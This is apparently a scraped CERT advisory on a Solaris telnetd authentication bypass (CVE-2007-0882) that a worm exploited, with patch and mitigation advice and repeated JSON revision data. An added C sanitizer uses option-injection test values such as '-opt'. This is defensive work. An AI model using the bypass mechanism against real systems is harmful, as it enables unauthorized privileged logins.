Sun Solaris telnet authentication bypass vulnerability
2007-02-12T00:00:00
ID VU:881872 Type cert Reporter CERT Modified 2008-07-21T18:13:00
Overview
A vulnerability in the Sun Solaris telnet daemon (in.telnetd) could allow a remote attacker to log on to the system with elevated privileges.
Description
The Sun Solaris telnet daemon may accept authentication information via the USER environment variable. However, the daemon does not properly sanitize this information before passing it to the login program, and login makes unsafe assumptions about the information. This may allow a remote attacker to trivially bypass the telnet and login authentication mechanisms. In some default configurations of Solaris this vulnerability cannot be exploited to gain access to the root account, but it can be used to gain privileges of other accounts, such as adm and lp.
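One way to apply the sanitization this description calls for, as an added example (it is not Sun's code or its patch): a client-supplied USER value is accepted only if it looks like a plain account name, and it is placed after an end-of-options marker so the receiving program can only read it as an operand. The function names, `MAX_USER_LEN`, `LOGIN_PATH`, the allowed character set and the assumption that login follows the getopt-style `--` convention are all illustrative assumptions.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MAX_USER_LEN 32            /* assumed upper bound for an account name */
#define LOGIN_PATH   "/bin/login"  /* assumed path, for illustration only */

/* First character: letter or underscore only, so the value can never
 * begin with '-' and be mistaken for an option by the next program. */
static int is_name_start(char c)
{
    return (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') || c == '_';
}

/* Remaining characters: a conservative allowlist (assumption). No
 * whitespace, so the value cannot be split into several arguments. */
static int is_name_char(char c)
{
    return is_name_start(c) || (c >= '0' && c <= '9') || c == '.' || c == '-';
}

/* Returns 1 if `user` may be handed to another program as an account
 * name, 0 otherwise. The value is untrusted: it comes from the client. */
int user_value_is_safe(const char *user)
{
    size_t len, i;

    if (user == NULL)
        return 0;
    len = strlen(user);
    if (len == 0 || len > MAX_USER_LEN)
        return 0;
    if (!is_name_start(user[0]))
        return 0;
    for (i = 1; i < len; i++)
        if (!is_name_char(user[i]))
            return 0;
    return 1;
}

/* Fills argv[] for the login program and returns the argument count,
 * or -1 if the array is too small. A rejected USER value is dropped,
 * so login falls back to prompting for a name and a password. An
 * accepted value is placed after "--" (end of options). */
int build_login_argv(const char *user, const char *argv[], size_t cap)
{
    size_t n = 0;

    if (argv == NULL || cap < 4)
        return -1;
    argv[n++] = LOGIN_PATH;
    if (user_value_is_safe(user)) {
        argv[n++] = "--";
        argv[n++] = user;
    }
    argv[n] = NULL;
    return (int)n;
}

int main(void)
{
    /* Constructed sample values, not captured traffic. */
    const char *samples[] = { "adm", "lp", "-opt", "adm extra", "" };
    const char *argv[4];
    size_t i;

    for (i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        int n = build_login_argv(samples[i], argv, 4);
        printf("%-12s -> %s\n", samples[i],
               n == 3 ? "passed after \"--\"" : "dropped, login will prompt");
    }
    return 0;
}
```

Validation on the sending side does not replace the vendor patch: the description faults both the daemon and login, so the receiving program must also stop trusting what it is handed.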
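According to Sun, Solaris 10 (SunOS 5.10) and Solaris "Nevada" (SunOS 5.11) are affected by this issue. More information is available in Sun Alert Notification 102802 (http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1) and in Alan Hargreaves' blog (http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit and http://blogs.sun.com/tpenta/entry/more_on_the_in_telnetd).
This vulnerability is being exploited by a worm. For more information, see the Security Sun Alert Feed (http://blogs.sun.com/security/entry/solaris_in_telnetd_worm_seen) and Technical Alert TA07-059A (http://www.us-cert.gov/cas/techalerts/TA07-059A.html).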
Impact
A remote attacker could log on to a vulnerable system via telnet and gain elevated privileges.
Solution
Apply a patch
Apply the patches referenced in Sun Alert Notification 102802.
Disable telnet
Disable telnet if it's not needed. Telnet can be disabled by issuing the following command:
# svcadm disable telnet
Restrict access
You may wish to block access to the vulnerable software from outside your network perimeter, specifically by blocking access to the ports used by Sun Solaris telnet (typically 23/tcp). This will limit your exposure to attacks.
Prefer SSH over telnet
SSH provides a comparatively more secure method for remotely logging into a system than telnet. As general advice, we recommend using SSH rather than telnet.
Vendor Information
Sun Microsystems, Inc.
Notified: February 12, 2007 Updated: February 16, 2007
Status
Vulnerable
Vendor Statement
No statement is currently available from the vendor regarding this vulnerability.
Vendor Information
The vendor has not provided us with any further information regarding this vulnerability.
This vulnerability was reported by Kingcope.
This document was written by Art Manion and Chris Taschner.
Other Information
CVE IDs: CVE-2007-0882
Severity Metric: 67.50
Date Public: 2007-02-10
Date First Published: 2007-02-12
Date Last Updated: 2008-07-21 18:13 UTC
Document Revision: 75
{"id": "VU:881872", "hash": "91c3d11f746092a9e45e9547c65370ef", "type": "cert", "bulletinFamily": "info", "title": "Sun Solaris telnet authentication bypass vulnerability", "description": "### Overview \n\nA vulnerability in the Sun Solaris telnet daemon (`in.telnetd`) could allow a remote attacker to log on to the system with elevated privileges.\n\n### Description \n\nThe Sun Solaris telnet daemon may accept authentication information via the `USER` environment variable. However, the daemon does not properly sanitize this information before passing it to the login program, and login makes unsafe assumptions about the information. This may allow a remote attacker to trivially bypass the telnet and login authentication mechanisms. In some default configurations of Solaris this vulnerability cannot be exploited to gain access to the `root` account, but it can be used to gain privileges of other accounts, such as `adm` and `lp`.\n\nAccording to Sun, Solaris 10 (SunOS 5.10) and Solaris \"Nevada\" (SunOS 5.11) are affected by this issue. More information is available in Sun Alert Notification [102802](<http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1>) and in Alan Hargreaves' blog, [here ](<http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit>)and [here](<http://blogs.sun.com/tpenta/entry/more_on_the_in_telnetd>). \n \nThis vulnerability is being exploited by a worm, for more information see the [Security Sun Alert Feed](<http://blogs.sun.com/security/entry/solaris_in_telnetd_worm_seen>) and Technical Alert [TA07-059A](<http://www.us-cert.gov/cas/techalerts/TA07-059A.html>). \n \n--- \n \n### Impact \n\nA remote attacker could log on to a vulnerable system via telnet and gain elevated privileges. \n \n--- \n \n### Solution \n\n**Apply a patch** \nApply the patches referenced in Sun Alert Notification [102802](<http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1>). 
\n \n--- \n \n \n**Disable telnet** \n \nDisable telnet if it's not needed. Telnet can be disabled by issuing the following command: \n\n\n`# svcadm disable telnet`**Restrict access** \n \nYou may wish to block access to the vulnerable software from outside your network perimeter, specifically by blocking access to the ports used by Sun Solaris telnet (typically 23/tcp). This will limit your exposure to attacks. \n \n**Prefer SSH over telnet** \n \nSSH provides a comparatively more secure method for remotely logging into a system than telnet. As general advice, we recommend using SSH rather than telnet. \n--- \n \n### Vendor Information\n\n881872\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ Sun Microsystems, Inc.\n\nNotified: February 12, 2007 Updated: February 16, 2007 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see Sun Alert Notification [102802](<http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23881872 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | | N/A \n \n \n\n\n### References \n\n * <http://www.ietf.org/rfc/rfc1572.txt>\n * <http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit>\n * <http://blogs.sun.com/tpenta/entry/more_on_the_in_telnetd>\n * <http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1>\n * 
<http://blogs.sun.com/security/entry/solaris_in_telnetd_worm_seen>\n * <http://secunia.com/advisories/24166/>\n * <http://securitytracker.com/alerts/2007/Feb/1017625.html>\n * <http://www.ciac.org/ciac/bulletins/r-139.shtml>\n * <http://riosec.com/solaris-telnet-0-day>\n * <http://www.computerdefense.org/?p=258>\n * <http://blog.ncircle.com/blogs/vert/archives/2007/02/whats_old_is_new_again.html>\n * <http://erratasec.blogspot.com/2007/02/trivial-remote-solaris-0day-disable.html>\n * <http://www.com-winner.com/0day_was_the_case_that_they_gave_me.pdf>\n * <http://asert.arbornetworks.com/2007/02/solaris-telnet-scanning-possible-worm/>\n\n### Acknowledgements\n\nThis vulnerability was reported by Kingcope.\n\nThis document was written by Art Manion and Chris Taschner.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2007-0882](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0882>) \n---|--- \n**Severity Metric:****** | 67.50 \n**Date Public:** | 2007-02-10 \n**Date First Published:** | 2007-02-12 \n**Date Last Updated: ** | 2008-07-21 18:13 UTC \n**Document Revision: ** | 75 \n", "published": "2007-02-12T00:00:00", "modified": "2008-07-21T18:13:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://www.kb.cert.org/vuls/id/881872", "reporter": "CERT", "references": ["http://www.ietf.org/rfc/rfc1572.txt", "http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit", "http://blogs.sun.com/tpenta/entry/more_on_the_in_telnetd", "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1", "http://blogs.sun.com/security/entry/solaris_in_telnetd_worm_seen", "http://secunia.com/advisories/24166/", "http://securitytracker.com/alerts/2007/Feb/1017625.html", "http://www.ciac.org/ciac/bulletins/r-139.shtml", "http://riosec.com/solaris-telnet-0-day", "http://www.computerdefense.org/?p=258", "http://blog.ncircle.com/blogs/vert/archives/2007/02/whats_old_is_new_again.html", 
"http://erratasec.blogspot.com/2007/02/trivial-remote-solaris-0day-disable.html", "http://www.com-winner.com/0day_was_the_case_that_they_gave_me.pdf", "http://asert.arbornetworks.com/2007/02/solaris-telnet-scanning-possible-worm/"], "cvelist": ["CVE-2007-0882"], "lastseen": "2019-10-09T19:50:57", "history": [{"bulletin": {"id": "VU:881872", "hash": "2809d462846fdfdd3fc9f15e654cc951a8fa756c5d6c06fa7acb76956bb3582e", "type": "cert", "bulletinFamily": "info", "title": "Sun Solaris telnet authentication bypass vulnerability", "description": "### Overview\n\nA vulnerability in the Sun Solaris telnet daemon (`in.telnetd`) could allow a remote attacker to log on to the system with elevated privileges.\n\n### Description\n\nThe Sun Solaris telnet daemon may accept authentication information via the `USER` environment variable. However, the daemon does not properly sanitize this information before passing it to the login program, and login makes unsafe assumptions about the information. This may allow a remote attacker to trivially bypass the telnet and login authentication mechanisms. In some default configurations of Solaris this vulnerability cannot be exploited to gain access to the `root` account, but it can be used to gain privileges of other accounts, such as `adm` and `lp`. \n\nAccording to Sun, Solaris 10 (SunOS 5.10) and Solaris \"Nevada\" (SunOS 5.11) are affected by this issue. More information is available in Sun Alert Notification [102802](<http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1>) and in Alan Hargreaves' blog, [here ](<http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit>)and [here](<http://blogs.sun.com/tpenta/entry/more_on_the_in_telnetd>). \n \nThis vulnerability is being exploited by a worm, for more information see the [Security Sun Alert Feed](<http://blogs.sun.com/security/entry/solaris_in_telnetd_worm_seen>) and Technical Alert [TA07-059A](<http://www.us-cert.gov/cas/techalerts/TA07-059A.html>). 
\n \n--- \n \n### Impact\n\nA remote attacker could log on to a vulnerable system via telnet and gain elevated privileges. \n \n--- \n \n### Solution\n\n**Apply a patch** \nApply the patches referenced in Sun Alert Notification [102802](<http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1>). \n \n--- \n \n \n**Disable telnet** \n \nDisable telnet if it's not needed. Telnet can be disabled by issuing the following command: \n\n\n`# svcadm disable telnet` **Restrict access** \n \nYou may wish to block access to the vulnerable software from outside your network perimeter, specifically by blocking access to the ports used by Sun Solaris telnet (typically 23/tcp). This will limit your exposure to attacks. \n \n**Prefer SSH over telnet** \n \nSSH provides a comparatively more secure method for remotely logging into a system than telnet. As general advice, we recommend using SSH rather than telnet. \n \n--- \n \n### Systems Affected \n\nVendor| Status| Date Notified| Date Updated \n---|---|---|--- \nSun Microsystems, Inc.| | 12 Feb 2007| 16 Feb 2007 \nIf you are a vendor and your product is affected, [let us know](<mailto:cert@cert.org?Subject=VU%23881872 Vendor Status Inquiry>).\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | N/A | N/A \n \n### References\n\n * <http://www.us-cert.gov/cas/techalerts/TA07-059A.html>\n * <http://www.cert.org/advisories/CA-1994-09.html>\n * <http://www.cert.org/advisories/CA-1995-14.html>\n * <https://www.securecoding.cert.org/confluence/x/-AY>\n * <http://www.kb.cert.org/vuls/id/220816>\n * <http://www.ietf.org/rfc/rfc1572.txt>\n * <http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit>\n * <http://blogs.sun.com/tpenta/entry/more_on_the_in_telnetd>\n * <http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1>\n * <http://blogs.sun.com/security/entry/solaris_in_telnetd_worm_seen>\n * <http://secunia.com/advisories/24166/>\n * 
<http://securitytracker.com/alerts/2007/Feb/1017625.html>\n * <http://www.ciac.org/ciac/bulletins/r-139.shtml>\n * <http://riosec.com/solaris-telnet-0-day>\n * <http://www.computerdefense.org/?p=258>\n * <http://blog.ncircle.com/blogs/vert/archives/2007/02/whats_old_is_new_again.html>\n * <http://erratasec.blogspot.com/2007/02/trivial-remote-solaris-0day-disable.html>\n * <http://www.com-winner.com/0day_was_the_case_that_they_gave_me.pdf>\n * <http://asert.arbornetworks.com/2007/02/solaris-telnet-scanning-possible-worm/>\n\n### Credit\n\nThis vulnerability was reported by Kingcope.\n\nThis document was written by Art Manion and Chris Taschner.\n\n### Other Information\n\n * CVE IDs: [CVE-2007-0882](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0882>)\n * Date Public: 10 Feb 2007\n * Date First Published: 12 Feb 2007\n * Date Last Updated: 21 Jul 2008\n * Severity Metric: 67.50\n * Document Revision: 75\n\n", "published": "2007-02-12T00:00:00", "modified": "2008-07-21T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.kb.cert.org/vuls/id/881872", "reporter": "CERT", "references": ["http://www.us-cert.gov/cas/techalerts/TA07-059A.html", "http://www.us-cert.gov/cas/techalerts/TA07-059A.html", "http://erratasec.blogspot.com/2007/02/trivial-remote-solaris-0day-disable.html", "http://blog.ncircle.com/blogs/vert/archives/2007/02/whats_old_is_new_again.html", "http://secunia.com/advisories/24166/", "http://www.ietf.org/rfc/rfc1572.txt", "http://www.cert.org/advisories/CA-1995-14.html", "http://asert.arbornetworks.com/2007/02/solaris-telnet-scanning-possible-worm/", "http://www.kb.cert.org/vuls/id/220816", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0882", "http://riosec.com/solaris-telnet-0-day", "http://www.computerdefense.org/?p=258", "http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit", 
"http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit", "http://blogs.sun.com/tpenta/entry/more_on_the_in_telnetd", "http://blogs.sun.com/tpenta/entry/more_on_the_in_telnetd", "http://www.cert.org/advisories/CA-1994-09.html", "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1", "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1", "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1", "http://www.ciac.org/ciac/bulletins/r-139.shtml", "http://blogs.sun.com/security/entry/solaris_in_telnetd_worm_seen", "http://blogs.sun.com/security/entry/solaris_in_telnetd_worm_seen", "https://www.securecoding.cert.org/confluence/x/-AY", "http://www.com-winner.com/0day_was_the_case_that_they_gave_me.pdf", "http://securitytracker.com/alerts/2007/Feb/1017625.html"], "cvelist": ["CVE-2007-0882", "CVE-2007-0882"], "lastseen": "2016-02-03T09:12:30", "history": [], "viewCount": 23, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4"}, "lastseen": "2016-02-03T09:12:30", "differentElements": ["cvss"], "edition": 1}, {"bulletin": {"id": "VU:881872", "hash": "f1f3c328d85903de229e3e4bd96b93c8c321af42df2954648f7fe38c37f7e433", "type": "cert", "bulletinFamily": "info", "title": "Sun Solaris telnet authentication bypass vulnerability", "description": "### Overview\n\nA vulnerability in the Sun Solaris telnet daemon (`in.telnetd`) could allow a remote attacker to log on to the system with elevated privileges.\n\n### Description\n\nThe Sun Solaris telnet daemon may accept authentication information via the `USER` environment variable. However, the daemon does not properly sanitize this information before passing it to the login program, and login makes unsafe assumptions about the information. This may allow a remote attacker to trivially bypass the telnet and login authentication mechanisms. 
In some default configurations of Solaris this vulnerability cannot be exploited to gain access to the `root` account, but it can be used to gain privileges of other accounts, such as `adm` and `lp`. \n\nAccording to Sun, Solaris 10 (SunOS 5.10) and Solaris \"Nevada\" (SunOS 5.11) are affected by this issue. More information is available in Sun Alert Notification [102802](<http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1>) and in Alan Hargreaves' blog, [here ](<http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit>)and [here](<http://blogs.sun.com/tpenta/entry/more_on_the_in_telnetd>). \n \nThis vulnerability is being exploited by a worm, for more information see the [Security Sun Alert Feed](<http://blogs.sun.com/security/entry/solaris_in_telnetd_worm_seen>) and Technical Alert [TA07-059A](<http://www.us-cert.gov/cas/techalerts/TA07-059A.html>). \n \n--- \n \n### Impact\n\nA remote attacker could log on to a vulnerable system via telnet and gain elevated privileges. \n \n--- \n \n### Solution\n\n**Apply a patch** \nApply the patches referenced in Sun Alert Notification [102802](<http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1>). \n \n--- \n \n \n**Disable telnet** \n \nDisable telnet if it's not needed. Telnet can be disabled by issuing the following command: \n\n\n`# svcadm disable telnet` **Restrict access** \n \nYou may wish to block access to the vulnerable software from outside your network perimeter, specifically by blocking access to the ports used by Sun Solaris telnet (typically 23/tcp). This will limit your exposure to attacks. \n \n**Prefer SSH over telnet** \n \nSSH provides a comparatively more secure method for remotely logging into a system than telnet. As general advice, we recommend using SSH rather than telnet. 
\n \n--- \n \n### Systems Affected \n\nVendor| Status| Date Notified| Date Updated \n---|---|---|--- \nSun Microsystems, Inc.| | 12 Feb 2007| 16 Feb 2007 \nIf you are a vendor and your product is affected, [let us know](<mailto:cert@cert.org?Subject=VU%23881872 Vendor Status Inquiry>).\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | N/A | N/A \n \n### References\n\n * <http://www.us-cert.gov/cas/techalerts/TA07-059A.html>\n * <http://www.cert.org/advisories/CA-1994-09.html>\n * <http://www.cert.org/advisories/CA-1995-14.html>\n * <https://www.securecoding.cert.org/confluence/x/-AY>\n * <http://www.kb.cert.org/vuls/id/220816>\n * <http://www.ietf.org/rfc/rfc1572.txt>\n * <http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit>\n * <http://blogs.sun.com/tpenta/entry/more_on_the_in_telnetd>\n * <http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1>\n * <http://blogs.sun.com/security/entry/solaris_in_telnetd_worm_seen>\n * <http://secunia.com/advisories/24166/>\n * <http://securitytracker.com/alerts/2007/Feb/1017625.html>\n * <http://www.ciac.org/ciac/bulletins/r-139.shtml>\n * <http://riosec.com/solaris-telnet-0-day>\n * <http://www.computerdefense.org/?p=258>\n * <http://blog.ncircle.com/blogs/vert/archives/2007/02/whats_old_is_new_again.html>\n * <http://erratasec.blogspot.com/2007/02/trivial-remote-solaris-0day-disable.html>\n * <http://www.com-winner.com/0day_was_the_case_that_they_gave_me.pdf>\n * <http://asert.arbornetworks.com/2007/02/solaris-telnet-scanning-possible-worm/>\n\n### Credit\n\nThis vulnerability was reported by Kingcope.\n\nThis document was written by Art Manion and Chris Taschner.\n\n### Other Information\n\n * CVE IDs: [CVE-2007-0882](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0882>)\n * Date Public: 10 Feb 2007\n * Date First Published: 12 Feb 2007\n * Date Last Updated: 21 Jul 2008\n * Severity Metric: 67.50\n * Document 
Revision: 75\n\n", "published": "2007-02-12T00:00:00", "modified": "2008-07-21T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.kb.cert.org/vuls/id/881872", "reporter": "CERT", "references": ["http://www.us-cert.gov/cas/techalerts/TA07-059A.html", "http://www.us-cert.gov/cas/techalerts/TA07-059A.html", "http://erratasec.blogspot.com/2007/02/trivial-remote-solaris-0day-disable.html", "http://blog.ncircle.com/blogs/vert/archives/2007/02/whats_old_is_new_again.html", "http://secunia.com/advisories/24166/", "http://www.ietf.org/rfc/rfc1572.txt", "http://www.cert.org/advisories/CA-1995-14.html", "http://asert.arbornetworks.com/2007/02/solaris-telnet-scanning-possible-worm/", "http://www.kb.cert.org/vuls/id/220816", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0882", "http://riosec.com/solaris-telnet-0-day", "http://www.computerdefense.org/?p=258", "http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit", "http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit", "http://blogs.sun.com/tpenta/entry/more_on_the_in_telnetd", "http://blogs.sun.com/tpenta/entry/more_on_the_in_telnetd", "http://www.cert.org/advisories/CA-1994-09.html", "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1", "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1", "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1", "http://www.ciac.org/ciac/bulletins/r-139.shtml", "http://blogs.sun.com/security/entry/solaris_in_telnetd_worm_seen", "http://blogs.sun.com/security/entry/solaris_in_telnetd_worm_seen", "https://www.securecoding.cert.org/confluence/x/-AY", "http://www.com-winner.com/0day_was_the_case_that_they_gave_me.pdf", "http://securitytracker.com/alerts/2007/Feb/1017625.html"], "cvelist": ["CVE-2007-0882", "CVE-2007-0882"], "lastseen": "2018-08-30T20:36:48", "history": [], "viewCount": 23, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4"}, "lastseen": 
"2018-08-30T20:36:48", "differentElements": ["cvss"], "edition": 2}, {"bulletin": {"id": "VU:881872", "hash": "dc90242f7a42e6dacc07fc51a27285aa", "type": "cert", "bulletinFamily": "info", "title": "Sun Solaris telnet authentication bypass vulnerability", "description": "### Overview\n\nA vulnerability in the Sun Solaris telnet daemon (`in.telnetd`) could allow a remote attacker to log on to the system with elevated privileges.\n\n### Description\n\nThe Sun Solaris telnet daemon may accept authentication information via the `USER` environment variable. However, the daemon does not properly sanitize this information before passing it to the login program, and login makes unsafe assumptions about the information. This may allow a remote attacker to trivially bypass the telnet and login authentication mechanisms. In some default configurations of Solaris this vulnerability cannot be exploited to gain access to the `root` account, but it can be used to gain privileges of other accounts, such as `adm` and `lp`. \n\nAccording to Sun, Solaris 10 (SunOS 5.10) and Solaris \"Nevada\" (SunOS 5.11) are affected by this issue. More information is available in Sun Alert Notification [102802](<http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1>) and in Alan Hargreaves' blog, [here ](<http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit>)and [here](<http://blogs.sun.com/tpenta/entry/more_on_the_in_telnetd>). \n \nThis vulnerability is being exploited by a worm, for more information see the [Security Sun Alert Feed](<http://blogs.sun.com/security/entry/solaris_in_telnetd_worm_seen>) and Technical Alert [TA07-059A](<http://www.us-cert.gov/cas/techalerts/TA07-059A.html>). \n \n--- \n \n### Impact\n\nA remote attacker could log on to a vulnerable system via telnet and gain elevated privileges. 
\n \n--- \n \n### Solution\n\n**Apply a patch** \nApply the patches referenced in Sun Alert Notification [102802](<http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1>). \n \n--- \n \n \n**Disable telnet** \n \nDisable telnet if it's not needed. Telnet can be disabled by issuing the following command: \n\n\n`# svcadm disable telnet` **Restrict access** \n \nYou may wish to block access to the vulnerable software from outside your network perimeter, specifically by blocking access to the ports used by Sun Solaris telnet (typically 23/tcp). This will limit your exposure to attacks. \n \n**Prefer SSH over telnet** \n \nSSH provides a comparatively more secure method for remotely logging into a system than telnet. As general advice, we recommend using SSH rather than telnet. \n \n--- \n \n### Systems Affected \n\nVendor| Status| Date Notified| Date Updated \n---|---|---|--- \nSun Microsystems, Inc.| | 12 Feb 2007| 16 Feb 2007 \nIf you are a vendor and your product is affected, [let us know](<mailto:cert@cert.org?Subject=VU%23881872 Vendor Status Inquiry>).\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | N/A | N/A \n \n### References\n\n * <http://www.us-cert.gov/cas/techalerts/TA07-059A.html>\n * <http://www.cert.org/advisories/CA-1994-09.html>\n * <http://www.cert.org/advisories/CA-1995-14.html>\n * <https://www.securecoding.cert.org/confluence/x/-AY>\n * <http://www.kb.cert.org/vuls/id/220816>\n * <http://www.ietf.org/rfc/rfc1572.txt>\n * <http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit>\n * <http://blogs.sun.com/tpenta/entry/more_on_the_in_telnetd>\n * <http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1>\n * <http://blogs.sun.com/security/entry/solaris_in_telnetd_worm_seen>\n * <http://secunia.com/advisories/24166/>\n * <http://securitytracker.com/alerts/2007/Feb/1017625.html>\n * <http://www.ciac.org/ciac/bulletins/r-139.shtml>\n * 
<http://riosec.com/solaris-telnet-0-day>\n * <http://www.computerdefense.org/?p=258>\n * <http://blog.ncircle.com/blogs/vert/archives/2007/02/whats_old_is_new_again.html>\n * <http://erratasec.blogspot.com/2007/02/trivial-remote-solaris-0day-disable.html>\n * <http://www.com-winner.com/0day_was_the_case_that_they_gave_me.pdf>\n * <http://asert.arbornetworks.com/2007/02/solaris-telnet-scanning-possible-worm/>\n\n### Credit\n\nThis vulnerability was reported by Kingcope.\n\nThis document was written by Art Manion and Chris Taschner.\n\n### Other Information\n\n * CVE IDs: [CVE-2007-0882](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0882>)\n * Date Public: 10 Feb 2007\n * Date First Published: 12 Feb 2007\n * Date Last Updated: 21 Jul 2008\n * Severity Metric: 67.50\n * Document Revision: 75\n\n", "published": "2007-02-12T00:00:00", "modified": "2008-07-21T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.kb.cert.org/vuls/id/881872", "reporter": "CERT", "references": ["http://www.us-cert.gov/cas/techalerts/TA07-059A.html", "http://www.us-cert.gov/cas/techalerts/TA07-059A.html", "http://erratasec.blogspot.com/2007/02/trivial-remote-solaris-0day-disable.html", "http://blog.ncircle.com/blogs/vert/archives/2007/02/whats_old_is_new_again.html", "http://secunia.com/advisories/24166/", "http://www.ietf.org/rfc/rfc1572.txt", "http://www.cert.org/advisories/CA-1995-14.html", "http://asert.arbornetworks.com/2007/02/solaris-telnet-scanning-possible-worm/", "http://www.kb.cert.org/vuls/id/220816", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0882", "http://riosec.com/solaris-telnet-0-day", "http://www.computerdefense.org/?p=258", "http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit", "http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit", "http://blogs.sun.com/tpenta/entry/more_on_the_in_telnetd", 
"http://blogs.sun.com/tpenta/entry/more_on_the_in_telnetd", "http://www.cert.org/advisories/CA-1994-09.html", "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1", "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1", "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1", "http://www.ciac.org/ciac/bulletins/r-139.shtml", "http://blogs.sun.com/security/entry/solaris_in_telnetd_worm_seen", "http://blogs.sun.com/security/entry/solaris_in_telnetd_worm_seen", "https://www.securecoding.cert.org/confluence/x/-AY", "http://www.com-winner.com/0day_was_the_case_that_they_gave_me.pdf", "http://securitytracker.com/alerts/2007/Feb/1017625.html"], "cvelist": ["CVE-2007-0882", "CVE-2007-0882"], "lastseen": "2018-08-31T02:37:49", "history": [], "viewCount": 25, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4"}, "lastseen": "2018-08-31T02:37:49", "differentElements": ["cvelist", "description", "modified", "references"], "edition": 3}, {"bulletin": {"id": "VU:881872", "hash": "478e08fd0d6ac0aeebe5954dc77889e8", "type": "cert", "bulletinFamily": "info", "title": "Sun Solaris telnet authentication bypass vulnerability", "description": "### Overview \n\nA vulnerability in the Sun Solaris telnet daemon (`in.telnetd`) could allow a remote attacker to log on to the system with elevated privileges.\n\n### Description \n\nThe Sun Solaris telnet daemon may accept authentication information via the `USER` environment variable. However, the daemon does not properly sanitize this information before passing it to the login program, and login makes unsafe assumptions about the information. This may allow a remote attacker to trivially bypass the telnet and login authentication mechanisms. 
